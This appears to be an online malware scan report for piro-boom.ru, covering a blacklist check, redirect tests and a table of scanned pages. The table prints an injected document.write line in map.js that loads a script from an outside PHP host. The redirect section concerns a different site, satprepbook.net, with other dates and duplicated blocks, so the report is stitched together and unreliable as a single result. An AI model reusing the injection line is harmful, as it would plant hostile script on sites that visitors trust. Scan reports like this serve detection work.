Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=piro-boom.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: satprepbook.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 09:52:39 GMT
Location: http://www.satprepbook.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.satprepbook.net/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: satprepbook.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 09:52:39 GMT
Location: http://www.satprepbook.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.satprepbook.net/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: satprepbook.net
Referer: http://www.google.com/search?q=satprepbook.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: satprepbook.net
Referer: http://www.google.com/search?q=satprepbook.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://piro-boom.ru/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Apr 2014 06:41:02 GMT Location: http://www.bolshoy.ru Server: nginx/1.1.19 Content-Length: 161 Content-Type: text/html | malicious |
http://www.bolshoy.ru/ | 200 OK Content-Length: 28580 Content-Type: text/html | clean |
http://yandex.st/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/ru_RU/all.js | 200 OK Content-Length: 164013 Content-Type: application/x-javascript | clean |
http://piro-boom.ru/static/CACHE/js/7a2d228bf3c3.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Apr 2014 06:41:08 GMT Location: http://www.bolshoy.ru Server: nginx/1.1.19 Content-Length: 161 Content-Type: text/html | malicious |
http://www.bolshoy.ru/test404page.js | HTTP/1.1 301 MOVED PERMANENTLY Connection: close Date: Sat, 26 Apr 2014 06:41:10 GMT Location: http://www.bolshoy.ru/test404page.js/ Server: Apache/1.3.37 (Unix) mod_wsgi/2.6 Python/2.6.2 Content-Type: text/html; charset=utf-8 | clean |
http://www.bolshoy.ru/test404page.js/ | 404 NOT FOUND Content-Length: 14132 Content-Type: text/html | clean |
http://www.bolshoy.ru/static/CACHE/js/7a2d228bf3c3.js | 200 OK Content-Length: 32624 Content-Type: application/x-javascript | clean |
http://www.bolshoy.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND Content-Length: 14132 Content-Type: text/html | clean |
http://www.bolshoy.ru/login/ | 200 OK Content-Length: 15023 Content-Type: text/html | clean |
http://www.bolshoy.ru/about/ | 200 OK Content-Length: 22842 Content-Type: text/html | clean |
http://www.bolshoy.ru/catalogue/all/ | 200 OK Content-Length: 47721 Content-Type: text/html | clean |
http://www.bolshoy.ru/warnings/ | 200 OK Content-Length: 26580 Content-Type: text/html | clean |
http://www.bolshoy.ru/partners/ | 200 OK Content-Length: 20263 Content-Type: text/html | clean |
http://www.bolshoy.ru/geography/ | 200 OK Content-Length: 42625 Content-Type: text/html | clean |
http://api-maps.yandex.ru/1.1/index.xml?key=AG2gE00BAAAAorULOAIA2PsfXRjIeYp6IBVUZbm72oFkNnAAAAAAAAAAAADLoD1ESGcC0hZs2rjTWU_IXbF_cA== | 200 OK Content-Length: 5375 Content-Type: text/javascript | clean |
http://www.bolshoy.ru/static/js/map.js | 200 OK Content-Length: 11878 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://orzechowski.co/ryCZYJW4.php?id=8052750"></script>');
| ||
http://www.bolshoy.ru/geography/view/22/?to=/catalogue/ | HTTP/1.1 302 FOUND Connection: close Date: Sat, 26 Apr 2014 06:41:17 GMT Location: http://www.bolshoy.ru/catalogue/ Server: Apache/1.3.37 (Unix) mod_wsgi/2.6 Python/2.6.2 Vary: Cookie Content-Type: text/html; charset=utf-8 Set-Cookie: city=22; Path=/ Set-Cookie: sessionid=2b52e85d0b5f9c1d7bb3a7e764cc45f5; expires=Sat, 10-May-2014 06:41:17 GMT; Max-Age=1209600; Path=/ | clean |
http://www.bolshoy.ru/catalogue/ | 200 OK Content-Length: 41541 Content-Type: text/html | clean |